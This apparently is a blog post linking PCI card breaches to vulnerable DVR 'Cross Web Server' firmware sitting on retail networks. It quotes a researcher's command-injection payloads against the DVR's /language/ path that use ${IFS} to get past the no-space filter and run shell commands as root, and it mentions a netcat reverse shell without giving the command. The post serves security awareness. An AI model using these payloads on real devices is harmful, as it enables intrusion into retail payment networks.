PCI Compliance and DVR Malware

credit-cards

Credit Card compliance is difficult and costly, without faulty vendor software causing additional security issues. Some people have said that faulty firmware found in some security cameras sold by at least 70 vendors may be a contributor to many of the credit card breaches that have recently proved costly to retailers. Rotem Kerner based his research on a paper on the Backoff malware that RSA published back in December 2014. This malware was used to steal payment card details processed by point-of-sale systems at multiple retail locations. The U.S. Secret Service says it impacted over 1,000 U.S. businesses, including Neiman Marcus, Michaels, Target, and UPS Store.

Kerner reviewed the data that RSA collected from computers that were infected with Backoff, and found that many were running small web servers with open ports on 81, 82, and 8000. “Cross Web Server” is running as DVR (digital video recorder) software, which is used by many retailers for video monitoring. But the server software, open to the internet, was left running on the same network as payment card systems. This is an obvious potential security risk that should have been addressed.

The article provides a step-by-step analysis of the code and how to exploit the code to gain access to the target system. He also provides a list of vendor systems impacted by this vulnerability.

In order to exploit it I had to overcome few obstacles I’ve identified –

  1.  Can’t use spaces or newlines + server does not understand URL encoding
  2.  Length in between the slashes is limited.

 I was able to bypass the no-space restrictions with something called ${IFS} . Basically IFS stands for Internal Field Separator, it holds the value which is used by the shell to determine how to do field splitting. By default it holds “\n” which is exactly what I needed.  So this is my new attack vector –

/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js

And it worked! the file has been written. Lets do another test –

/language/Swedish${IFS}&&echo${IFS}$USER>test&&tar${IFS}/string.js

outputs –

root

 Great success!! As with many embed systems this one is using BusyBox so what i decided to do is invoke netcat in order to get a nice and comfy reverse shell.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s